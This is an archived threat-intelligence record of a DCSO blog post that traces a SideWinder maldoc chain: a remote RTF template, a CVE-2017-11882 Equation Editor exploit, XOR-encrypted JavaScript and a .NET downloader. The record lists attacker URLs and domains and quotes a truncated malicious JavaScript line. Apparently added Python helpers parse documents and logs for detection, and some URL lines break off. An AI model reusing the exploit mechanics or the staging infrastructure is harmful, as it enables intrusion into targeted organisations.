{
	"id": "044f4c51-039e-4758-a922-d4e8720d0800",
	"created_at": "2026-04-06T00:14:07.801913Z",
	"updated_at": "2026-04-10T03:37:20.277185Z",
	"deleted_at": null,
	"sha1_hash": "ec8f2ac3fba54c46a0da97686bf17ab381efe68f",
	"title": "404 — File still found",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2056546,
	"plain_text": "404 — File still found\r\nBy DCSO CyTec Blog\r\nPublished: 2024-01-18 · Archived: 2026-04-05 16:54:05 UTC\r\nIn early February 2022, we came across a tweet from ShadowChasing1 identifying a SideWinder-related Word document which referenced a template URL. In this article, we share our insights from investigating the file and other infrastructure connected to it.\r\nhttps://twitter.com/ShadowChasing1/status/1490984172797984770\r\nThis blog was authored by Axel Wauer\r\nFirst Look\r\nThe file mentioned in the tweet is named ‘Briefing on Ongoing Projects.docx’ (eeeb99f94029fd366dcde7da2a75a849833c5f5932d8f1412a89ca15b9e9ebb7) and is available on VirusTotal and on our GitHub.\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 1 of 13\n\nContent of ‘Briefing on Ongoing Projects.docx’ as seen on VirusTotal.\r\nThe document itself contains little information and appears empty aside from the address block. However, a deeper inspection of the document structure reveals that the document loads an RTF template from https://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf, which we assume represents the next stage of the attack. At the time of our analysis, this file was no longer available under the given URL, yet the domain still resolved to 185.255.17.46.\r\nAfter unpacking the document structure (a .docx is a ZIP archive of OPC parts), we could locate the suspicious URL in the relationships part word/_rels/document.xml.rels. This part describes the relations between the document part and other parts or external targets; in this case it points to an RTF template to be downloaded, as shown in the (truncated) snippet below:\r\n# word/_rels/document.xml.rels\r\n\u003cRelationship Id=\"fid990\"Type=\"http://schemas.openxmlformats.org/offic\r\nWith the URL being dead, we went back to VirusTotal to use the graph feature. It indicates that file.rtf was indeed downloaded and provides the file’s hash, 1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a.
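Automating the relationship check above, as an added example that is not the DCSO tooling: the helper below opens a .docx as the ZIP archive it is, parses every *.rels part and lists relationships whose TargetMode is External, then narrows them to the types Word resolves on its own when the document is opened. The sample document it builds is constructed for the demo; the fid990 Id and the attachedTemplate type are only assumed to match what the real document carried, and the URL is whatever the caller passes in.

```python
# Added example, not the code from the DCSO post: list external relationship
# targets in a .docx, which is where the template URL above was hiding.
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = '{http://schemas.openxmlformats.org/package/2006/relationships}'
# Relationship types Word fetches without user interaction when opening the
# file. A hyperlink is External too, but needs a click, so it is left out.
AUTO_FETCH_TYPES = {'attachedTemplate', 'oleObject', 'frame', 'subDocument'}


def external_relationships(docx_bytes):
    # One dict per Relationship with TargetMode='External' in any *.rels part.
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith('.rels'):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + 'Relationship'):
                if rel.get('TargetMode', 'Internal') != 'External':
                    continue
                found.append({
                    'part': name,
                    'id': rel.get('Id'),
                    'type': rel.get('Type', '').rsplit('/', 1)[-1],
                    'target': rel.get('Target'),
                })
    return found


def auto_fetched_targets(docx_bytes):
    # Only the targets Word will pull down on open: the remote-template case.
    return [r['target'] for r in external_relationships(docx_bytes)
            if r['type'] in AUTO_FETCH_TYPES]


def build_sample_docx(template_url):
    # Constructed minimal .docx: one document part and a relationships part with
    # an internal styles link, an external hyperlink (should be ignored) and an
    # external attachedTemplate modelled on the fid990 relationship quoted above.
    rels = '''<?xml version='1.0' encoding='UTF-8'?>
<Relationships xmlns='http://schemas.openxmlformats.org/package/2006/relationships'>
  <Relationship Id='rId1' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles' Target='styles.xml'/>
  <Relationship Id='rId2' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink' Target='https://example.invalid/' TargetMode='External'/>
  <Relationship Id='fid990' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate' Target='%s' TargetMode='External'/>
</Relationships>''' % template_url
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('word/document.xml', '<document/>')
        zf.writestr('word/_rels/document.xml.rels', rels)
    return buf.getvalue()


if __name__ == '__main__':
    sample = build_sample_docx('https://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf')
    for rel in external_relationships(sample):
        print(rel['part'], rel['id'], rel['type'], rel['target'])
    print('auto-fetched:', auto_fetched_targets(sample))
```

On a real sample, pass the bytes of the .docx straight to external_relationships; the template can also live in word/_rels/settings.xml.rels, which is why the helper walks every *.rels part rather than only document.xml.rels.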
Based on this, we continue our analysis by looking into file.rtf.\r\nVirusTotal contact graph of ‘Briefing on Ongoing Projects.docx’\r\nfile.rtf(1)\r\nOur next step was to analyse the .rtf file with the hash 1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a, available on VirusTotal and on our GitHub.\r\nUnfortunately, the content of the RTF file does not appear to be malicious: it is a single line of fewer than ten characters. The complete content of the file is shown below:\r\n{\\rtf1 }\r\nThe file was first uploaded to VirusTotal on 2021-11-03 and had therefore already been online for quite some time. It appears to be some kind of placeholder file. Checking the listed relations of this file on VirusTotal clearly shows its relation to the analysed document:\r\nRelation between file.rtf and domains marked as malicious on VirusTotal\r\nAll domains listed in the screenshot above follow the same path pattern, which can be described as:\r\n\u003c…\u003e /0/0/0/m/files-\u003chex_data\u003e/file.rtf\r\nFrom this information, we assume that the original malicious RTF file was replaced after the initial delivery with a placeholder file.
This file is small in size and not rich in content, yet it is unique enough to lead to related attacker domains on VirusTotal, since it is not a default file.\r\nReviewing all related domains on the list revealed that the domain dgmp-paknavy.mod-pk[.]com has a relation to another RTF file (4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588) available on VirusTotal, which could potentially have been the file.rtf before replacement.\r\nfile.rtf(2)\r\nAs mentioned above, our next step is to analyse another RTF file, which we will refer to as file.rtf(2), with the hash 4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588. The file is available on VirusTotal and on our GitHub.\r\nA first look at the file is promising: the file size is 66.21 KB and it was initially submitted to VirusTotal on 2022-02-08. The file is indeed a valid Rich Text Format file and contains the three sections listed in the screenshot below.\r\nThe RTF file contains three sections\r\nrtfobj reveals more information\r\nAs soon as we extracted the first object (1.a, c2809dcc935ed3c7923f1da67d1c5dddc4ece2353a4c0eab8c511a14fa7e04c1), we noticed that the hash was mentioned by another researcher on Twitter as part of the malicious document, reinforcing our assumption that this is the original file.rtf.\r\nBesides 1.a, the RTF file contains another embedded object, which is triggered via \\objupdate when the document is loaded.
This indicates the next execution step after ‘Briefing on Ongoing Projects.docx’ has loaded the RTF file.\r\nRaw view of the embedded object triggered via \\objupdate\r\nThe triggered code attempts to execute the embedded Equation Editor object, which has known vulnerabilities: CVE-2017-11882 (FONT), CVE-2018-0798 (MATRIX) and CVE-2018-0802 (FONT), as mentioned here and here.\r\nThe CVE listed for file.rtf(2) on VirusTotal is CVE-2017-11882, a stack buffer overflow in the Equation Editor (EQNEDT32.EXE): the name of a FONT record is copied into a fixed-size buffer without checking its length, which leads to code execution.\r\nTo verify this claim, we created a 010 Editor template to parse the embedded object based on the protocol description of OLE objects and MTEF objects. We share the template on our GitHub page along with the analysis files. The parser allows us to follow the execution flow further by extracting the initial exploit code contained in the FONT name section of the object.\r\nParsed OLE/MTEF object with overflowing FONT name containing shellcode (red)\r\nAfter extracting and converting the shellcode via CyberChef, it becomes clear that the exploit code abuses the FONT name field. The exploit code then triggers a loop to decrypt embedded XOR-encrypted JavaScript code. The XOR key used in this case is 12 (0x0C).\r\nThe assembler code used for the exploit coincides with findings in this article here.
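The two steps just described, pulling the overflowing FONT name out of the MTEF stream and decrypting the XOR-encrypted script inside it, as an added example that is neither the DCSO 010 template nor the CyberChef recipe. The object it parses is constructed: the OLE header has every field but cbHdr zeroed, 44 filler bytes stand in for the shellcode and a short script replaces the real one. The buffer-size threshold is an assumption (the post does not give the size). Instead of hard-coding the key 12, the helper recovers the key by known plaintext, so it also works on a sample whose loop uses a different key.

```python
# Added example, not the DCSO template: walk the MTEF stream of an Equation
# Native object, extract the FONT name that CVE-2017-11882 overflows, then
# recover the single-byte XOR key of the JavaScript hidden in it.
import struct

EQN_OLE_HDR_LEN = 28   # EQNOLEFILEHDR (cbHdr = 0x1C) precedes the MTEF bytes
MTEF_HDR_LEN = 5       # version, platform, product, product version, subversion
TAG_END, TAG_LINE, TAG_FONT = 0x00, 0x01, 0x08
# Assumption (the post gives no size): any FONT name longer than this is
# treated as an overflow of the fixed stack buffer the vulnerable copy fills.
FONT_NAME_LIMIT = 36


def font_records(equation_native):
    # Minimal MTEF v3 walker: enough to reach the FONT record of the exploit
    # layout (LINE followed by FONT). The high nibble of a tag byte carries
    # option flags and is masked off; any other record type ends the walk.
    data = equation_native[EQN_OLE_HDR_LEN + MTEF_HDR_LEN:]
    names, pos = [], 0
    while pos < len(data):
        tag = data[pos] & 0x0F
        pos += 1
        if tag == TAG_END:
            break
        if tag == TAG_LINE:
            continue
        if tag == TAG_FONT:
            pos += 2                      # typeface and style bytes
            end = data.find(0, pos)       # the name runs up to its NUL terminator
            if end < 0:
                end = len(data)
            names.append(data[pos:end])
            pos = end + 1
            continue
        break
    return names


def overflowing_font_names(equation_native, limit=FONT_NAME_LIMIT):
    return [n for n in font_records(equation_native) if len(n) > limit]


def recover_xor_payload(blob, known_prefix=b'javascript:'):
    # Known-plaintext recovery: a single-byte XOR key is the one value that
    # maps some window of the blob onto the expected prefix. Returns
    # (offset, key, plaintext from that offset on) or None.
    for off in range(len(blob) - len(known_prefix) + 1):
        key = blob[off] ^ known_prefix[0]
        if all((blob[off + i] ^ key) == known_prefix[i] for i in range(len(known_prefix))):
            return off, key, bytes(b ^ key for b in blob[off:])
    return None


def build_sample_object(js=b'javascript:eval(x)', key=12, filler_len=44):
    # Constructed Equation Native stream: OLE header, MTEF header, a LINE record
    # and one FONT record whose name is filler (shellcode stand-in) + XOR script.
    enc = bytes(b ^ key for b in js)
    if 0 in enc:
        raise ValueError('ciphertext contains a NUL, which would cut the font name short')
    name = b'A' * filler_len + enc
    mtef = bytes([0x03, 0x01, 0x01, 0x03, 0x0A])                  # MTEF v3 header
    mtef += bytes([TAG_LINE, TAG_FONT, 0x5A, 0x5A]) + name + bytes([0])
    ole_hdr = struct.pack('<H', EQN_OLE_HDR_LEN) + bytes(EQN_OLE_HDR_LEN - 2)
    return ole_hdr + mtef


if __name__ == '__main__':
    obj = build_sample_object()
    for name in overflowing_font_names(obj):
        print('FONT name of', len(name), 'bytes ->', recover_xor_payload(name))
```

On a real sample, feed the Equation Native bytes extracted with rtfobj to overflowing_font_names: a FONT name that is hundreds of bytes long and starts with machine code rather than a typeface name is the CVE-2017-11882 signature, and recover_xor_payload then locates the script wherever the loop placed it.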
The disassembly for the exploit and the XOR decryption is shown below:\r\nCyberChef disassembly of the exploit code\r\nCyberChef disassembly of the XOR loop\r\nThe decrypted JavaScript code listed below (truncated) executes the file 1.a, which is dropped to a temp path when the RTF is loaded:\r\njavascript:eval(\"sa=ActiveXObject;ab=new sa(\\\"Scripting.FileSystemObject\\\");eval(ab.OpenTextFile(ab.G\r\nThe 1.a file is stored on disk in obfuscated form in order to hinder automated analysis. We share the obfuscated and deobfuscated file on GitHub.\r\nOn execution, the file deserialises an object, identifies installed antivirus software and appends the result as a parameter to a URL. The deserialised object is invoked by calling the function “work” with two slightly different URLs, which we assume are used for downloading the next stage and for error reporting.\r\nThe included URLs are listed below:\r\nNext stage:\r\nhttps://dgmp-paknavy.mod-pk[.]com/14325/1/10/3/1/1/1865884360/uAiXa3upVnbI8GnagA2EgfGUnQxzUvVIEq4r3YT\r\nhttps://dgmp-paknavy.mod-pk[.]com/14325/1/10/3/3/0/1865884360/uAiXa3upVnbI8GnagA2EgfGUnQxzUvVIEq4r3YT\r\nNext, we extracted the deserialised .NET object (95f99d5da860ece23154ddef0bb289797dc2bd711034ce39c1ac85b9305919cb) and decompiled it with ILSpy. Unsurprisingly, this file was obfuscated as well, so we provide the obfuscated and the deobfuscated file on GitHub, too.\r\nIn general, the program evaluates the previously discovered antivirus software and reports it if available.
If “work” is called with a local file path, the script executes the contained Windows shell commands, embedding them into a WshShell JavaScript object which it runs via mshta.exe. If “work” is called with a URL, as seen in our sample, a file containing assembly commands is downloaded. It is then decrypted with a 32-bit key prepended to that file and executed. Notably, there are also error-reporting capabilities: the program reports exceptions at different positions throughout its execution by appending an exception message to the URL before calling it.\r\nDuring our analysis and validation, we found related work analysing similar malicious documents which correspond to our sample. The article dissects the samples in depth and validates the attribution claim made in the initial tweet of our article. Based on its structure and the vulnerability used, this file seems to be related to the Royal Road v3 framework, as mentioned here.\r\nAt this point, there were no clear indicators or hashes of the next execution stage, and we therefore stopped following the execution path further.\r\nAttack Chain\r\nHere, we summarise the execution flow of the file. The malicious document is opened by the victim and an RTF template file is then loaded. This RTF file contains the remote code execution exploit for CVE-2017-11882, which abuses the FONT name vulnerability in the Equation Editor, triggered via an embedded Equation Editor object. The exploit executes a JavaScript file previously written to disk through the RTF template, which in turn executes .NET code. This .NET code downloads another stage, which is no longer available online.
The ability to execute an already existing local file is implemented in the code, but not used in this process flow.\r\nMalicious execution flow of the document\r\nPlaceholder files\r\nAs mentioned before, the nearly empty file.rtf(1) we initially found was not very useful in terms of content. We assume that the original file on the server was removed to protect the following stage by replacing it with a placeholder file. Yet, because the file is custom, it can be utilised as an identifier to establish a relationship between the attacks. In this case, we are able to link eight domains as shown below.\r\nVirusTotal indicates communication between maldocs and the placeholder file\r\nBased on the given relation on VirusTotal, the URLs of these eight domains all exhibit the same path pattern (\u003c…\u003e /0/0/0/m/files-\u003chex_data\u003e/file.rtf), which supports the assumption of a possible connection between them.
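A hunting helper for that path pattern, added here as an example and not part of the DCSO post: it refangs a URL, matches the path against <...>/0/0/0/m/files-<hex>/file.rtf and groups hits by domain, which is the pivot the VirusTotal relations gave us. The proxy-log lines it runs over are constructed; only the URLs in them are taken from this post.

```python
# Added example, not from the DCSO post: match the placeholder download path
# in web-proxy logs and cluster the hits by domain.
import re
from urllib.parse import urlsplit

# <...>/0/0/0/m/files-<hex>/file.rtf: a run of numeric segments, the fixed
# 0/0/0/m marker, an 8-hex-digit tag and the file name.
PLACEHOLDER_PATH = re.compile(
    r'^(?P<prefix>(?:/[0-9]+)+)/0/0/0/m/files-(?P<tag>[0-9a-f]{8})/file[.]rtf$')


def refang(url):
    # IoCs are published defanged; undo that before parsing.
    return url.replace('[.]', '.').replace('hxxp', 'http')


def match_placeholder_url(url):
    # Return the components of a matching URL, or None.
    parts = urlsplit(refang(url))
    m = PLACEHOLDER_PATH.match(parts.path)
    if not m:
        return None
    host = parts.hostname or ''
    return {
        'host': host,
        'domain': '.'.join(host.split('.')[-2:]),  # last two labels; enough for these TLDs
        'prefix': m.group('prefix'),
        'tag': m.group('tag'),
    }


def hunt(log_lines):
    # Scan whitespace-separated log lines for URLs and group hits by domain.
    hits = {}
    for line in log_lines:
        for token in line.split():
            if '://' not in token:
                continue
            hit = match_placeholder_url(token)
            if hit is not None:
                hits.setdefault(hit['domain'], []).append(hit)
    return hits


# Constructed proxy-log lines (timestamp, client, method, URL, status). The two
# placeholder URLs and the next-stage URL are the ones quoted in the post; the
# fourth line shows that the tag alone, without the 0/0/0/m path, is not a hit.
SAMPLE_LOG = [
    '2022-02-08T09:14:02Z 10.0.0.12 GET https://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf 200',
    '2022-02-08T09:14:05Z 10.0.0.12 GET https://dgmp-paknavy.mod-pk[.]com/14325/1/10/3/1/1/1865884360/uAiXa3upVnbI8GnagA2EgfGUnQxzUvVIEq4r3YT 404',
    '2022-02-09T11:02:41Z 10.0.0.31 GET https://srilankanavy.ksew[.]org/5471/1/1101/2/0/0/0/m/files-cd6e6dbd/file.rtf 200',
    '2022-02-09T11:03:10Z 10.0.0.31 GET https://www.example.com/files-5291bef6/file.rtf 200',
]

if __name__ == '__main__':
    for domain, matches in hunt(SAMPLE_LOG).items():
        print(domain, [(h['host'], h['prefix'], h['tag']) for h in matches])
```

The numeric prefix and the hex tag are returned separately because they differ per campaign while the 0/0/0/m marker does not; keeping them lets you tell a re-used staging server from a newly registered one when the same tag shows up under a different host.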
We list the domains below.\r\nhttp://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf\r\nhttp://dgpr.paknvay-pk[\r\nA quick check of the domains led to related posts attributing the domains to the same APT, shown in the list below.\r\n+-----------------------+---------------------------+\r\n| Attribution source    | Domains                   |\r\n+-----------------------+---------------------------+\r\n| @_jsoo_               | bahariafoundation[.]live  |\r\n+-----------------------+---------------------------+\r\n| @uslss_etr            | cvix[.]live               |\r\n+-----------------------+---------------------------+\r\n| Checkpoint Research   | kpt-pk[.]net              |\r\n+-----------------------+---------------------------+\r\n| @ShadowChasing1       | ksew[.]org                |\r\n+-----------------------+---------------------------+\r\n| @ShadowChasing1       | ministry-pk[.]net         |\r\n+-----------------------+---------------------------+\r\n| @uslss_etr            | mod-pk[.]com              |\r\n+-----------------------+---------------------------+\r\n| @JVPv5sIM3eFmGyi      | moma-pk[.]org             |\r\n+-----------------------+---------------------------+\r\n| @uslss_etr            | paknvay-pk[.]net          |\r\n+-----------------------+---------------------------+\r\nIn conclusion, this placeholder file creates a relationship between several different attacks, supporting the attribution made by other researchers.\r\nIn addition, we checked the validity periods of the TLS certificates for the domains in question on crt.sh. The graphic below illustrates the validity periods of the relevant TLS certificates; even though we cannot be sure when exactly the attacks were carried out, we can at least narrow down the time frame.\r\nValidity span of TLS certificates for each identified domain\r\nConclusion\r\nA sample attributed to SideWinder was published on Twitter. We analysed the sample and followed related IoCs as far as possible.
Along this analysis, we found related work verifying the file structure and attribution. We also noticed that different SideWinder samples downloaded the same nearly empty RTF file, which we assume acts as a placeholder file after the original payload was delivered. This placeholder file is not a default file, which allowed us to identify related domains of this campaign.\r\nAll extracted and deobfuscated files can be downloaded from our GitHub repository DCSO CyTec.\r\nIoCs\r\nWe provide a MISP event on our GitHub.\r\n### SHA256\r\n## Document from Tweet\r\neeeb99f94029fd366dcde7da2a75a849833c5f5932d8f1412a89ca15b9e9ebb7\r\n## Placeholder RTF Template\r\n1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a\r\n## Malicious RTF Template\r\n4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588\r\n## Malicious embedded JavaScript\r\nc2809dcc935ed3c7923f1da67d1c5dddc4ece2353a4c0eab8c511a14fa7e04c1\r\n## Malicious embedded .Net file\r\n95f99d5da860ece23154ddef0bb289797dc2bd711034ce39c1ac85b9305919cb\r\n## Documents linked to RTF placeholder\r\ncb933361cd6c26ca61c441a40da394a505086f572fd7e9bd425bf086adf50edc\r\n6a00b6f20123258fb8db9ccb3e6b07947475da3d8e797cdcfe01ce8144139e38\r\n146e2c51cd7c904e0eeb641daa6ee956e80b48b198b9d2a9fd9b92b68399f9d1\r\nd3a0b7c5a1eafbf7d381b6ee064083496476163da5dfed53096fac36c2b30738\r\nf09ed1c47f61e918fd67e66c342eb45476c6a5bb8367a24dbea63a1b8fd979d3\r\nf765b0b6e4a34eb95c6f0ddf058bc88d5ef9ec2b11a5f3504d1673f4f69aceca\r\n60017e193cfd0df017eb8d0cc5f4bfc49593d90430a3e89a287f6afb83672236\r\n### URLs\r\nhttp://dgmp-paknavy.mod-pk[.\r\nhttp://dgpr.paknvay-pk[.]net/5330/1/1330/2/0/0/0/m/files-4d9d0395/file.rtf\r\nhttp://mohgovsg.bahariafoundation[.]live/5320/1/13/2/0/0/0/m/files-1ddf5195/file.rtf\r\nhttps://cabinet-gov-pk.ministry-pk[.]net/14300/1/1273/2/0/0/0/m/files-68ebf815/file.rtf\r\nhttps://careitservices.paknvay-pk[.]net/5359/1/4586/2/0/0/0/m/files-266ad911/file.rtf\r\nhttps://defencelk.cvix[.]live/3023/1/54082/2/0/0/0/m/files-0c31ed2d/file.rtf\r\nhttps://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf\r\nhttps://dgpr.paknvay-pk[.]net/5330/1/1330/2/0/0/0/m/files-4d9d0395/file.rtf\r\nhttps://mailaplf.cvix[.]live/2968/1/50390/2/0/0/0/m/files-7630e91a/file.rtf\r\nhttps://mohgovsg.bahariafoundation[.]live/5320/1/13/2/0/0/0/m/files-1ddf5195/file.rtf\r\nhttps://sppc.moma-pk[.]org/5281/1/4265/2/0/0/0/m/files-d2608a99/file.rtf\r\nhttps://srilankanavy.ksew[.]org/5471/1/1101/2/0/0/0/m/files-cd6e6dbd/file.rtf\r\nhttp://maritimepakistan.kpt-pk[.]net/5434/1/3694/2/0/0/0/m/files-ce32ed85/file.rtf\r\nhttps://maritimepakistan.kpt-pk[.]net/5434/1/3694/2/0/0/0/m/files-ce32ed85/file.rtf\r\n### Domains\r\nbaharia\r\ncvix[.]live\r\nkpt-pk[.]net\r\nksew[.]org\r\nministry-pk[.]net\r\nmod-pk[.]com\r\nmoma-pk[.]org\r\npaknvay-pk[.]net\r\nSource: https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c"
	],
	"report_names": [
		"404-file-still-found-d52c3834084c"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e",
			"created_at": "2023-01-06T13:46:39.080551Z",
			"updated_at": "2026-04-10T02:00:03.206572Z",
			"deleted_at": null,
			"main_name": "RAZOR TIGER",
			"aliases": [
				"APT-C-17",
				"T-APT-04",
				"SideWinder"
			],
			"source_name": "MISPGALAXY:RAZOR TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b9fc913-06c6-4432-8c58-86a3ac614564",
			"created_at": "2022-10-25T16:07:24.185236Z",
			"updated_at": "2026-04-10T02:00:04.893541Z",
			"deleted_at": null,
			"main_name": "SideWinder",
			"aliases": [
				"APT-C-17",
				"APT-Q-39",
				"BabyElephant",
				"G0121",
				"GroupA21",
				"HN2",
				"Hardcore Nationalist",
				"Rattlesnake",
				"Razor Tiger",
				"SideWinder",
				"T-APT-04"
			],
			"source_name": "ETDA:SideWinder",
			"tools": [
				"BroStealer",
				"Capriccio RAT",
				"callCam"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "173f1641-36e3-4bce-9834-c5372468b4f7",
			"created_at": "2022-10-25T15:50:23.349637Z",
			"updated_at": "2026-04-10T02:00:05.3486Z",
			"deleted_at": null,
			"main_name": "Sidewinder",
			"aliases": [
				"Sidewinder",
				"T-APT-04"
			],
			"source_name": "MITRE:Sidewinder",
			"tools": [
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434447,
	"ts_updated_at": 1775792240,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ec8f2ac3fba54c46a0da97686bf17ab381efe68f.pdf",
		"text": "https://archive.orkl.eu/ec8f2ac3fba54c46a0da97686bf17ab381efe68f.txt",
		"img": "https://archive.orkl.eu/ec8f2ac3fba54c46a0da97686bf17ab381efe68f.jpg"
	}
}